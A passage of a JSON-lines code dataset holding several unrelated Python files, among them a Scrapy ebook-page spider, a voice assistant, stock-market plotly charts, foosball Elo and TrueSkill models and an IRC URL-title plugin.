''\nEND_WORD = ''\nUNKNOWN_WORD = ''\nSEP_CONTEXT_WORD = ''\nSEP_PAIR_WORD = ''\nSEP_RET_WORD = ''\nPAD_IDX = 0\nSTART_IDX = 1\nEND_IDX = 2\nNO_CONTEXT_IDX = 3\nUNKNOWN_IDX = 4\nSEP_CONTEXT_IDX = 5\nSEP_PAIR_IDX = 6\nSEP_RET_IDX = 7","sub_path":"DataClass/Constants.py","file_name":"Constants.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"372056576","text":"from scrapy.spider import BaseSpider\r\nfrom scrapy.selector import HtmlXPathSelector\r\nfrom scrapy.http import Request\r\n\r\nimport datetime\r\nimport re\r\nimport book_structure as book\r\n\r\nclass WowEbook(BaseSpider):\r\n name = \"wow\"\r\n allowed_domains = [\"wowebook.be\"]\r\n# start_urls = [\"http://www.wowebook.be/book/zk-developers-guide/\"]\r\n def parse(self, response):\r\n file_name = response.url.split('/')[-2] + \".xml\"\r\n hxs = HtmlXPathSelector(response)\r\n try:\r\n lst = hxs.select('//em/a/text()').extract()\r\n book.categoriesE.clear()\r\n for val in lst:\r\n tag = book.etree.Element('tag')\r\n tag.set('site', self.allowed_domains[0])\r\n tag.text = val\r\n book.categoriesE.append(tag)\r\n for val in hxs.select('//img[@class=\"alignleft\"]').extract()[0].split('\"'):\r\n if val.find(\"http\") != -1:\r\n book.images_itemE.text = val\r\n book.titleE.text = hxs.select('//title/text()').extract()[0].split('|')[0]\r\n book.sizeE.text = hxs.select('//pre/strong/text()').extract()[0]\r\n book.dl_dateE.text = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n book.post_dateE.text = hxs.select('//span[@class=\"date\"]/text()').extract()[0]\r\n book.resource_urlE.text = response.url\r\n book.source_urlE.text = response.url\r\n book.resource_urlE.set(\"site\", \"www.wowebook.be\")\r\n content = hxs.select('//div[@class=\"entry clearfix\"]').extract()[0]\r\n index = content.find(\"Book Details\")\r\n real_content = content[:index-4]\r\n book.contentE.text = re.sub(r'\\n|\\t','',re.sub(r'\\t|\\n|||
|',\"\",real_content))\r\n isbn_count = 0\r\n isbn10 = 0\r\n isbn13 = 0\r\n language = 0\r\n release_date = 0\r\n page = 0\r\n isbn_list = hxs.select('//div[@class=\"entry clearfix\"]/div/ul/li').extract()\r\n #isbn_list = hxs.select('//div[@class=\"entry clearfix\"]/ul/li').extract()\r\n for val in isbn_list:\r\n if val.find(\"ISBN-10\") != -1:\r\n isbn10 = isbn_count\r\n if val.find(\"ISBN-13\") != -1:\r\n isbn13 = isbn_count\r\n if val.find(\"Language\") != -1:\r\n language = isbn_count\r\n if val.find(\"Publisher\") != -1:\r\n release_date = isbn_count\r\n if val.find(\"Paperback\") != -1 or val.find(\"Hardcover\") != -1:\r\n if val.find(\"Paperback\"):\r\n book.formatE.set('type', 'Paperback')\r\n else:\r\n book.formatE.set('type', 'Hardcover')\r\n page = isbn_count\r\n isbn_count = isbn_count + 1\r\n if release_date != 0:\r\n book.releaseE.text = isbn_list[release_date].split('(')[1].split(')')[0]\r\n if language != 0:\r\n book.languageE.text = isbn_list[language].split()[-1].split('<')[0]\r\n if page != 0:\r\n book.pagesE.text = isbn_list[page].split()[1]\r\n if isbn10 != 0:\r\n book.idE.text = isbn_list[isbn10].split()[-1].split('<')[0]\r\n book.isbn10E.text = isbn_list[isbn10].split()[-1].split('<')[0]\r\n if isbn13 != 0:\r\n book.isbn13E.text = isbn_list[isbn13].split()[-1].split('<')[0]\r\n\r\n book.dl_urlE.text = \"http://\" + hxs.select('//div[@class=\"entry clearfix\"]/div/pre/strong/a/@href').extract()[0].split('http://')[-1] + \".html\"\r\n book.text2E.text = hxs.select('//div[@class=\"entry clearfix\"]/div/pre/strong/a/@title').extract()[0]\r\n book.textE.text = hxs.select('//div[@class=\"entry clearfix\"]/div/pre/strong/text()').extract()[1]\r\n file = open(file_name, 'w')\r\n book.doc.write(file)\r\n file.close()\r\n except IndexError:\r\n book.text2E.text = hxs.select('//div[@class=\"entry clearfix\"]/div/pre/strong/a/@title').extract()[0]\r\n book.dl_urlE.text = \"http://\" + hxs.select('//div[@class=\"entry clearfix\"]/div/pre/strong/a/@href').extract()[0].split('http://')[-1] + \".html\"\r\n book.textE.text = hxs.select('//div[@class=\"entry clearfix\"]/div/pre/strong/text()').extract()[1]\r\n file = open(file_name, 'w')\r\n book.doc.write(file)\r\n file.close()\r\n file_error = open(\"error1.log\", 'a')\r\n msg = response.url + ' IndexError' + '\\n'\r\n file_error.write(msg)\r\n file_error.close()\r\n except UnboundLocalError:\r\n msg = response.url + ' UnboundLocalError' + '\\n'\r\n file = open(file_name, 'w')\r\n book.doc.write(file)\r\n file.close()\r\n file_error = open(\"error1.log\", 'a')\r\n file_error.write(msg)\r\n file_error.close()\r\n\r\n def start_requests(self):\r\n with open(\"error.log\", 'rb') as urls:\r\n for url in urls:\r\n yield Request(url.split()[0], self.parse)\r\n","sub_path":"ebook/book_structure_v2_with_try.py","file_name":"book_structure_v2_with_try.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"371924241","text":"import pyttsx3 #pip install pyttsx3\nimport datetime \nimport speech_recognition as sr #pip install speechRecognition #$pip install speech-recognition\nimport wikipedia #pip install wikipedia\nimport webbrowser\nimport os\nimport random\n\n\nengine = pyttsx3.init('sapi5') #sapi5 is the speech recognization application developed by Microsoft \nvoices = engine.getProperty('voices')\nengine.setProperty('voice',voices[1].id)\n\ndef speak(audio):\n \"\"\"Speak function is defined to let the system to speak \"\"\"\n engine.say(audio)\n engine.runAndWait()\n\ndef wishMe():\n \"\"\" Call the date and time module and help to recogize the time and date which wll help to say GM/GA/GE\"\"\"\n hour = int(datetime.datetime.now().hour) \n if hour >=0 and hour<12:\n speak(\"Good Morning\")\n\n elif hour>=12 and hour<18:\n speak(\"Good Afternoon\")\n\n else:\n speak(\"Good Evening\")\n\n speak(\"Hey Sir I am Siere your Virtual Assistant. How may I help you\")\n\ndef takeCommand():\n '''\n It takes michrophone input from the user and returns string as output\n In simple words it listen your commands and gives the output that you spoked\n '''\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening!!!......\")\n r.pause_threshold = 0.9\n r.energy_threshold =380\n r.phrase_threshold = 0.4\n audio = r.listen(source)\n\n try:\n print(\"Recognizing.....\")\n query = r.recognize_google(audio,language='en-in') # Converssion of audio data to English language \n query = r.recognize_google(audio, language='en-us')\n print(f\"User said: {query}\\n\")\n\n except Exception:\n print(\"Please say that again......\")\n speak(\"Please say that again\")\n return \"None\"\n\n return query\n\n\n# if __name__ == '__main__':\nwishMe()\nwhile True:\n query = takeCommand().lower()\n\n #Logic for executing tasks bassed on query\n if 'wikipedia' in query:\n # speak(\"Searching Wikipedia....\")\n query = query.replace(\"wikipedia\",\"\")\n results = wikipedia.summary(query,sentences=1)\n speak(\"According to Wikipedia\")\n print(results)\n speak(results)\n elif 'open youtube' in query:\n webbrowser.open(\"youtube.com\")\n elif 'open google' in query:\n webbrowser.open(\"google.com\")\n elif 'open amazon' in query:\n webbrowser.open(\"amazon.in\")\n elif 'open stackoverflow' in query:\n webbrowser.open(\"stackoverflow.com\")\n\n elif 'play music' in query:\n music_dir = 'C:\\\\Users\\\\ayush\\\\OneDrive\\\\Desktop\\\\AYUSHMAAN\\\\musics\\\\English'\n songs = os.listdir(music_dir)\n os.startfile(os.path.join(music_dir, songs[random.randrange(0,len(songs))]))\n speak(\"Sure!\")\n\n elif 'the time' in query:\n strTime = datetime.datetime.now().strftime(\"%H:%M:%S\")\n speak(f\"Sir, the time is {strTime}\") \n\n elif 'open code' in query:\n codepath = \"C:\\\\Users\\\\ayush\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\"\n # speak(\"Opening VS Code\")\n print(\"\")\n os.startfile(codepath)\n\n elif 'next' in query:\n music_dir = 'C:\\\\Users\\\\ayush\\\\OneDrive\\\\Desktop\\\\AYUSHMAAN\\\\musics\\\\English'\n songs = os.listdir(music_dir)\n os.startfile(os.path.join(music_dir, songs[random.randrange(0,len(songs))]))\n \n elif 'developer' in query:\n speak(\"I was developed by Ayushmaan on 21 OCtober 2020\")\n\n elif 'who are you' in query:\n speak(\"I am an Assistant which does not contain any AI or ML techniques but still can help you\")\n\n elif 'help' in query:\n speak(\"I can help you with the mentioned things\")\n print(\"Wikipedia,Amazon,Google,PlayMusic,Time,Open code, who are you,new,\\n At End to close say quit\")\n speak(\"I can search for you in Wikipedia, I can open Amazon ,I can Open Youtube ,I can Play Music ,I can tell you time and many more\")\n \n\n elif 'new' in query:\n webbrowser.open(\"aajtak.in\")\n \n\n elif 'quit' in query:\n speak(\"Hold it don't go \")\n speak(\"Meet you Soon Sir\")\n exit(0)\n","sub_path":"DAY3/alex_by_ayushmaan/alex(need-to-change-code-for-diff-pc).py","file_name":"alex(need-to-change-code-for-diff-pc).py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"499001421","text":"# Copyright Contributors to the Pyro project.\n# SPDX-License-Identifier: Apache-2.0\n\nfrom collections import Hashable\nfrom contextlib import contextmanager\n\nimport funsor.interpreter as interpreter\n\n\n@contextmanager\ndef memoize(cache=None):\n \"\"\"\n Exploit cons-hashing to do implicit common subexpression elimination\n \"\"\"\n if cache is None:\n cache = {}\n\n @interpreter.interpretation(interpreter._INTERPRETATION) # use base\n def memoize_interpretation(cls, *args):\n key = (cls,) + tuple(id(arg) if (type(arg).__name__ == \"DeviceArray\") or not isinstance(arg, Hashable)\n else arg for arg in args)\n if key not in cache:\n cache[key] = cls(*args)\n return cache[key]\n\n with interpreter.interpretation(memoize_interpretation):\n yield cache\n","sub_path":"funsor/memoize.py","file_name":"memoize.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"122407738","text":"from plotly.offline import init_notebook_mode,iplot\nimport plotly.graph_objs as go\nimport plotly.io as pio\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport sqlite3\n\ninit_notebook_mode(connected=True)\n\n#########\nconn = sqlite3.connect('cn_stocks.db')\n\ntoday_all_changepercent_over_0 =pd.read_sql('select changepercent from today_all where volume>0 and changepercent<11 and changepercent>0',conn)\n\nhist_data_today_all_changepercent_over_0 = np.histogram(today_all_changepercent_over_0['changepercent'],bins=10,range=(0,11))\n\ntoday_all_changepercent_less_0 =pd.read_sql('select changepercent from today_all where volume>0 and changepercent>-11 and changepercent<0',conn)\n\nhist_data_today_all_changepercent_less_0 = np.histogram(today_all_changepercent_less_0['changepercent'],bins=10,range=(-10.5,0))\n\n# first chart plots arable land from 1990 to 2015 in top 10 economies \n# as a line chart\nprint(sum(hist_data_today_all_changepercent_over_0[0]))\nprint(sum(hist_data_today_all_changepercent_less_0[0]))\n\ngraph_one = []\ngraph_one.append(\ngo.Bar(\nx=(hist_data_today_all_changepercent_over_0[1]),\ny=hist_data_today_all_changepercent_over_0[0],\nname=u'{}只上涨'.format(sum(hist_data_today_all_changepercent_over_0[0])),\ntext=hist_data_today_all_changepercent_over_0[0],\ntextposition = 'outside',\nmarker=dict(\ncolor='#d10031',\n)\n)\n)\n\ngraph_one.append(\ngo.Bar(\nx=(hist_data_today_all_changepercent_less_0[1]),\ny=hist_data_today_all_changepercent_less_0[0],\nname=u'{}只下跌'.format(sum(hist_data_today_all_changepercent_less_0[0])),\ntext=hist_data_today_all_changepercent_less_0[0],\ntextposition = 'outside',\nmarker=dict(\ncolor='#02c927',\n)\n)\n)\n\nlabels = [str(s)+'%' for s in range(-10,11)]\ntickvals = [s for s in range(-10,11)]\nlayout_one = dict(title = u'市场表现',\n xaxis=go.layout.XAxis(title=u'幅度',ticktext=labels,tickvals=tickvals),\n yaxis = dict(title = '数量',tick0=0, dtick=100)\n )\n\nfig = go.Figure(data=graph_one, layout=layout_one)\niplot(fig)\npio.write_image(fig, '/Users/roy/Desktop/fig1.png', width=600, height=350, scale=2)\n\n########\nstocks_60 =pd.read_sql('select * from stocks_60_days',conn)\n\nstats = {}\nfor n,g in stocks_60.groupby('date'):\n stats.setdefault(n,{})\n stats[n].setdefault('over_5%',0)\n stats[n].setdefault('less_5%',0)\n stats[n]['over_5%'] = len(g[g.p_change>=5.0])\n stats[n]['less_5%'] = len(g[g.p_change<=-5.0])\n\ndata = pd.DataFrame.from_dict(stats, orient='index')\n\n\ndata = data[-20:]\ngraph_two = []\ngraph_two.append(\ngo.Bar(\nx=data.index,\ny=data['over_5%'],\nname=u'上升超5%',\ntext=data['over_5%'],\ntextposition = 'auto',\ntextfont=dict(\nfamily='Arial',\nsize=3,\ncolor='#000000',\n),\nmarker=dict(\ncolor='#d10031',\n),\nopacity=0.5\n)\n)\n\ngraph_two.append(\ngo.Bar(\nx=data.index,\ny=data['less_5%'],\nname=u'下跌超5%',\ntext=data['less_5%'],\ntextposition = 'auto',\ntextfont=dict(\nfamily='Arial',\nsize=3,\ncolor='#000000',\n),\nmarker=dict(\ncolor='#02c927',\n),\nopacity=0.5\n)\n)\n\nlabels = [d[:-9] for d in data.index]\ntickvals = data.index\n\nlayout_two = dict(title = u'市场表现二',\n xaxis=go.layout.XAxis(ticktext=labels,tickvals=tickvals,tickangle=-90),\n yaxis = dict(title = '数量',tick0=0, dtick=100),\n )\nfig = go.Figure(data=graph_two, layout=layout_two)\niplot(fig)\npio.write_image(fig, '/Users/roy/Desktop/fig2.png', width=600, height=350, scale=3)\n########\nstocks_60 = pd.read_sql('select * from stocks_60_days ORDER BY date',conn)\ntop_break_through = {}\ndown_break_through = {}\ncode_list = stocks_60['code'].unique().tolist()\nfor code in code_list:\n cur_stock = stocks_60[stocks_60.code==code].sort_values('date')\n top_break_dates = cur_stock[cur_stock.close>=cur_stock.max120]['date'].values.tolist()\n for date in top_break_dates:\n top_break_through.setdefault(date,[])\n top_break_through[date].append(code)\n\n down_break_dates = cur_stock[cur_stock.close<=cur_stock.min120]['date'].values.tolist()\n for date in down_break_dates:\n down_break_through.setdefault(date,[])\n down_break_through[date].append(code)\n\ntop_break_records = pd.DataFrame.from_dict(top_break_through,orient='index')\ntop_break_records.index = pd.to_datetime(top_break_records.index)\ntop_break_records = ~top_break_records.isnull()\ntop_break_records = top_break_records.sort_index().sum(axis=1)\n\ndown_break_records = pd.DataFrame.from_dict(down_break_through,orient='index')\ndown_break_records.index = pd.to_datetime(down_break_records.index)\ndown_break_records = ~down_break_records.isnull()\ndown_break_records = down_break_records.sort_index().sum(axis=1)\n\ndata = pd.concat([top_break_records,down_break_records],axis=1)\ndata.columns=['top_break','down_break']\ndata = data.fillna(0)\n\ndata = data[-20:]\ngraph_three = []\ngraph_three.append(\ngo.Bar(\nx=data.index,\ny=data['top_break'],\nname=u'创半年新高',\ntext=data['top_break'],\ntextposition = 'outside',\nmarker=dict(\ncolor='#d10031',\n)\n)\n)\n\ngraph_three.append(\ngo.Bar(\nx=data.index,\ny=data['down_break'],\nname=u'创半年新低',\ntext=data['down_break'],\ntextposition = 'outside',\nmarker=dict(\ncolor='#02c927',\n)\n)\n)\n\nlabels = [d.strftime('%m/%d') for d in data.index]\ntickvals = data.index\n\nlayout_three = dict(title = u'市场表现三',\n xaxis=go.layout.XAxis(ticktext=labels,tickvals=tickvals,tickangle=-90),\n yaxis = dict(title = '数量',tick0=0, dtick=100),\n )\nfig = go.Figure(data=graph_three, layout=layout_three)\niplot(fig)\npio.write_image(fig, '/Users/roy/Desktop/fig3.png', width=600, height=350, scale=3)\n########","sub_path":"plotly_static.py","file_name":"plotly_static.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"451032540","text":"from .plugin import Plugin\n\nfrom re import compile, IGNORECASE, MULTILINE, UNICODE, DOTALL\nfrom html import unescape\nimport requests \n\nfrom requests_futures.sessions import FuturesSession\nfrom requests.exceptions import RequestException\n\n\nclass TitlePlugin(Plugin):\n def __init__(self, config, client):\n client.register_listener(\"PRIVMSG\", self._handle_title)\n self._client = client\n self._pages = {}\n self._titles_fetched = False\n self._url_match = compile('https?://[^\\s/$.?#].[^\\s]*')\n self._title_match = compile('(.+)<\\/title>', IGNORECASE | MULTILINE | UNICODE)\n self._session = FuturesSession(max_workers=5)\n\n super(TitlePlugin, self).__init__(config)\n\n def _handle_title(self, nick, target, message, **rest):\n pages = self._url_match.findall(message)\n if pages:\n self._pages = {page: None for page in pages}\n self._titles_fetched = False\n\n if message.startswith(self._config['trigger']):\n if self._pages:\n self.send_command(nick=nick, target=target)\n\n def _handle_command(self, command):\n if command['target'].startswith(\"#\"):\n prefix = \"{nick}: \".format(**command)\n target = command['target']\n else:\n prefix = \"\"\n target = command['nick']\n\n multiple = len(self._pages) > 1\n\n if not self._titles_fetched:\n self._async_send_titles(prefix, target, self._pages.keys(), multiple)\n self._titles_fetched = True\n else:\n for page, title in self._pages.items():\n self._send_title(prefix, target, page, title, multiple)\n\n def _async_send_titles(self, prefix, target, pages, multiple):\n headers = {'User-Agent': 'Spixy IRC Bot'}\n for page in pages:\n try:\n head_request = requests.head(page, headers=headers)\n if \"text\" not in head_request.headers['Content-Type']:\n self._page = \"Error, no title found.\"\n return\n except:\n self._page = \"Error, no title found.\"\n return\n\n futures = [self._session.get(page, background_callback=self._title_callback(prefix, target, page, multiple), headers=headers)\n for page in pages]\n\n # Must \"join\" requests-futures requests for some odd reason.\n for future in futures:\n future.result()\n\n def _title_callback(self, prefix, target, page, multiple):\n def callback(session, response):\n try:\n response.raise_for_status()\n except RequestException:\n self._logger.exception(\"Got status {status} when retrieving {page}\".format(status=response.status_code,\n page=page))\n self._pages[page] = \"Error, status code {status}\".format(status=response.status_code)\n self._send_title(prefix, target, page, self._pages[page], multiple)\n return\n\n try:\n title = self._title_match.search(response.text).group(1)\n self._pages[page] = unescape(title)\n self._send_title(prefix, target, page, title, multiple)\n return\n except AttributeError:\n self._pages[page] = \"Error, no title found.\"\n self._send_title(prefix, target, page, self._pages[page], multiple)\n\n return callback\n\n def _send_title(self, prefix, target, page, title, multiple):\n if title is None:\n return\n\n if multiple:\n message = \"{prefix}{page} - {title}\".format(prefix=prefix, page=page, title=title)\n else:\n message = \"{prefix}{title}\".format(prefix=prefix, title=title)\n\n self._client.privmsg(target, message)\n","sub_path":"spixy/plugins/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"605760391","text":"from protorpc import messages\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext.ndb import msgprop\nfrom random import shuffle\nimport elo\nimport skill\n\nclass GameStatus(messages.Enum):\n active = 1\n complete = 2\n deleted = 3\n\nclass Position(messages.Enum):\n offense = 1\n defense = 2\n either = 3\n\nclass Side(messages.Enum):\n red = 1\n blue = 2\n\nclass Image(ndb.Model):\n data = ndb.BlobProperty(required=True)\n\nclass Player(ndb.Model):\n name = ndb.StringProperty(required=True)\n elo = ndb.IntegerProperty(required=True, default=1600)\n total_games = ndb.IntegerProperty(required=True, default=0)\n total_wins = ndb.IntegerProperty(required=True, default=0)\n image = ndb.KeyProperty(kind='Image')\n deleted = ndb.BooleanProperty(required=True, default=False)\n\n # TrueSkill\n mu = ndb.FloatProperty(required=True, default=skill.DEFAULT_MU)\n sigma = ndb.FloatProperty(required=True, default=skill.DEFAULT_SIGMA)\n\n def win_percentage(self):\n if self.total_games > 0:\n return round(float(self.total_wins) / self.total_games * 100, 2)\n else:\n return None\n\n def trueskill_rating(self):\n return skill.get_rating(self)\n\n def trueskill_gain(self, teammate, opponents):\n ratings = skill.update_ratings((self, teammate), opponents)[0][0]\n rating = skill.calculate_rating(ratings.mu, ratings.sigma)\n\n return rating - self.trueskill_rating()\n\n def trueskill_loss(self, teammate, opponents):\n ratings = skill.update_ratings(opponents, (self, teammate))[1][0]\n rating = skill.calculate_rating(ratings.mu, ratings.sigma)\n\n return self.trueskill_rating() - rating\n\nclass Game(ndb.Model):\n length = ndb.IntegerProperty(default=6)\n status = msgprop.EnumProperty(GameStatus, required=True)\n timestamp = ndb.DateTimeProperty(auto_now_add=True, required=True)\n\n # Players: (current positions)\n red_o = ndb.KeyProperty(kind='Player', required=True)\n red_d = ndb.KeyProperty(kind='Player', required=True)\n blue_o = ndb.KeyProperty(kind='Player', required=True)\n blue_d = ndb.KeyProperty(kind='Player', required=True)\n\n # Scores:\n red_shots = ndb.KeyProperty(kind='Shot', repeated=True)\n blue_shots = ndb.KeyProperty(kind='Shot', repeated=True)\n\n # Team Elo Ratings (at start of match):\n red_elo = ndb.IntegerProperty(required=True)\n blue_elo = ndb.IntegerProperty(required=True)\n\n # TrueSkill\n quality = ndb.IntegerProperty(required=True)\n\n def initialize(self, length, red_o, red_d, blue_o, blue_d):\n self.length = length\n self.status = GameStatus.active\n\n self.red_o = red_o\n self.red_d = red_d\n self.blue_o = blue_o\n self.blue_d = blue_d\n\n red_o = self.red_o.get()\n red_d = self.red_d.get()\n blue_o = self.blue_o.get()\n blue_d = self.blue_d.get()\n\n self.red_elo = (red_o.elo + red_d.elo) / 2\n self.blue_elo = (blue_o.elo + blue_d.elo) / 2\n\n self.quality = skill.calculate_quality((red_o, red_d), (blue_o, blue_d))\n\n def initialize_random(self, length, players):\n self.length = length\n self.status = GameStatus.active\n\n shuffle(players)\n self.red_o = players[0]\n self.red_d = players[1]\n self.blue_o = players[2]\n self.blue_d = players[3]\n\n red_o = self.red_o.get()\n red_d = self.red_d.get()\n blue_o = self.blue_o.get()\n blue_d = self.blue_d.get()\n\n self.red_elo = (red_o.elo + red_d.elo) / 2\n self.blue_elo = (blue_o.elo + blue_d.elo) / 2\n\n self.quality = skill.calculate_quality((red_o, red_d), (blue_o, blue_d))\n\n def initialize_matched(self, length, players):\n self.length = length\n self.status = GameStatus.active\n\n shuffle(players)\n p1 = players[0].get()\n p2 = players[1].get()\n p3 = players[2].get()\n p4 = players[3].get()\n\n red = (p1, p2)\n blue = (p3, p4)\n\n teams = {'red': red, 'blue': blue}\n quality = skill.calculate_quality(red, blue)\n\n r = (p1, p3)\n b = (p2, p4)\n q = skill.calculate_quality(r, b)\n if q > quality:\n teams = {'red': r, 'blue': b}\n quality = q\n\n r = (p1, p4)\n b = (p2, p3)\n q = skill.calculate_quality(r, b)\n if q > quality:\n teams = {'red': r, 'blue': b}\n quality = q\n\n red_o = teams['red'][0]\n red_d = teams['red'][1]\n blue_o = teams['blue'][0]\n blue_d = teams['blue'][1]\n\n self.red_o = red_o.key\n self.red_d = red_d.key\n self.blue_o = blue_o.key\n self.blue_d = blue_d.key\n\n self.red_elo = (red_o.elo + red_d.elo) / 2\n self.blue_elo = (blue_o.elo + blue_d.elo) / 2\n\n self.quality = quality\n\n def register_shot(self, player_key):\n \"\"\"\n Register a shot for the player with the specified key\n\n Raises an Exception if the key is invalid or the game\n is over\n \"\"\"\n\n # Get the side and position of the player who made the shot:\n side, position = self.side_and_position(player_key)\n\n if not side or not position:\n raise Exception(\"Error: invalid player\")\n\n # Create the shot record:\n shot = Shot(parent = self.key)\n shot.player = player_key\n shot.position = position\n shot.side = side\n\n # If red scored:\n if side == Side.red:\n shot.against = self.blue_d\n shot.put()\n self.red_shots.append(shot.key)\n\n # Red half time:\n if len(self.red_shots) == self.length/2:\n temp = self.red_o\n self.red_o = self.red_d\n self.red_d = temp\n\n # Mark game complete if over:\n if len(self.red_shots) >= self.length:\n self.status = GameStatus.complete\n\n # If blue scored:\n elif side == Side.blue:\n shot.against = self.red_d\n shot.put()\n self.blue_shots.append(shot.key)\n\n # Blue half time:\n if len(self.blue_shots) == self.length/2:\n temp = self.blue_o\n self.blue_o = self.blue_d\n self.blue_d = temp\n\n # Mark game complete if over:\n if len(self.blue_shots) >= self.length:\n self.status = GameStatus.complete\n\n # Adjust player's ratings if over:\n if self.is_complete():\n red_o = self.red_o.get()\n red_d = self.red_d.get()\n blue_o = self.blue_o.get()\n blue_d = self.blue_d.get()\n\n self.adjust_player_ratings(red_o, red_d, blue_o, blue_d)\n\n red_o.put()\n red_d.put()\n blue_o.put()\n blue_d.put()\n\n self.put()\n\n def adjust_player_ratings(self, red_o, red_d, blue_o, blue_d):\n winning_side = self.winning_side()\n if winning_side == None:\n return\n\n red_o.total_games += 1\n red_d.total_games += 1\n blue_o.total_games += 1\n blue_d.total_games += 1\n\n self.red_elo = (red_o.elo + red_d.elo) / 2\n self.blue_elo = (blue_o.elo + blue_d.elo) / 2\n\n if winning_side == Side.red:\n red_o.total_wins += 1\n red_d.total_wins += 1\n\n self.update_elo(red_o, red_d, self.red_elo, blue_o, blue_d, self.blue_elo)\n self.update_trueskill((red_o, red_d), (blue_o, blue_d))\n\n elif winning_side == Side.blue:\n blue_o.total_wins += 1\n blue_d.total_wins += 1\n\n self.update_elo(blue_o, blue_d, self.blue_elo, red_o, red_d, self.red_elo)\n self.update_trueskill((blue_o, blue_d), (red_o, red_d))\n\n else:\n raise Exception(\"Error: invalid winning side\")\n\n def update_elo(self, winner1, winner2, winner_elo, loser1, loser2, loser_elo):\n winner_points, loser_points = elo.calculate(winner_elo, loser_elo)\n\n winner1.elo = winner1.elo + winner_points\n winner2.elo = winner2.elo + winner_points\n\n loser1.elo = loser1.elo + loser_points\n loser2.elo = loser2.elo + loser_points\n\n def update_trueskill(self, winners, losers):\n winner_updates, loser_updates = skill.update_ratings(winners, losers)\n\n for i in range(len(winners)):\n winners[i].mu = winner_updates[i].mu\n winners[i].sigma = winner_updates[i].sigma\n\n for i in range(len(losers)):\n losers[i].mu = loser_updates[i].mu\n losers[i].sigma = loser_updates[i].sigma\n\n\n def side_and_position(self, player_key):\n \"\"\"\n Get the side and position of the specified player\n\n \"\"\"\n if player_key == self.red_o:\n return Side.red, Position.offense\n if player_key == self.red_d:\n return Side.red, Position.defense\n if player_key == self.blue_o:\n return Side.blue, Position.offense\n if player_key == self.blue_d:\n return Side.blue, Position.defense\n\n def is_complete(self):\n return self.status == GameStatus.complete\n\n def winning_side(self):\n if not self.is_complete():\n return None\n elif len(self.red_shots) == self.length:\n return Side.red\n else:\n return Side.blue\n\n def red_score(self):\n return len(self.red_shots)\n\n def blue_score(self):\n return len(self.blue_shots)\n\n def red_elo_points_to_gain(self):\n return elo.calculate(self.red_elo, self.blue_elo)[0]\n\n def blue_elo_points_to_gain(self):\n return elo.calculate(self.blue_elo, self.red_elo)[0]\n\nclass Shot(ndb.Model): # ancestor = Game => strongly consistent results\n player = ndb.KeyProperty(kind='Player', required=True)\n position = msgprop.EnumProperty(Position, required=True)\n side = msgprop.EnumProperty(Side, required=True)\n against = ndb.KeyProperty(kind='Player', required=True)\n timestamp = ndb.DateTimeProperty(auto_now_add=True, required=True)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"316703223","text":"\n\nfrom xai.brain.wordbase.nouns._lattice import _LATTICE\n\n#calss header\nclass _LATTICES(_LATTICE, ):\n\tdef __init__(self,): \n\t\t_LATTICE.__init__(self)\n\t\tself.name = \"LATTICES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"lattice\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_lattices.py","file_name":"_lattices.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"68569845","text":"import math\ns=str(input())\nS=list(s)\nn=len(S)\n#t=0\n#r=0\n# work without this also and if using it then change the range of first loop in range(0,r)\n# how many loop we need to go \n#for i in range(0,n):\n# t=t+i \n# if(t>n):\n# break\n# r=r+1\nfor i in range(0,n):\n for j in range(i,-1,-1):\n if(j<len(S)):\n print(S[j],end=\" \")\n elif(len(S)==0):\n break\n else:\n print(\"*\",end=\" \")\n print(\"\",end=\"\\n\")\n for k in range(0,i+1):\n if(len(S)>0):\n S.pop(0)\n if(len(S)==0):\n break\n","sub_path":"23-01-19/23-01.py","file_name":"23-01.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"421649332","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 21 05:26:28 2018\n\n@author: prem\n\"\"\"\n\nfrom datetime import timedelta\nfrom pytz import timezone\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC, LinearSVC, NuSVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import preprocessing\nfrom collections import Counter\nimport talib\nimport statsmodels.api as sm\nimport numpy \nimport pandas as pd\n\ndef custom_split(string_list):\n \"\"\"\n Parses a string and returns it in list format, without the '[' ']' \n\n :params string_list: a list that's been made into string e.g. \"[ hello, hello2]\"\n :returns: a string that's been made into a list e.g. \"[hello, hello2]\" => [hello, hello2]\n \"\"\"\n # Remove the '[' and ']'\n string_list = string_list[1:-1].split(',')\n # Convert to float\n string_list = [float(s) for s in string_list]\n return string_list\n\ndef get_day_delta(current_date):\n \"\"\"\n Takes in the current date, checks it's day of week, and returns an appropriate date_delta\n E.g. if it's a Monday, the previous date should be Friday, not Sunday\n\n :params current_date: Pandas TimeStamp\n :returns: an int \n \"\"\"\n if current_date.isoweekday() == 1:\n return 3\n else:\n return 1\n\ndef fill_func(df, row, num_dates):\n \"\"\"\n 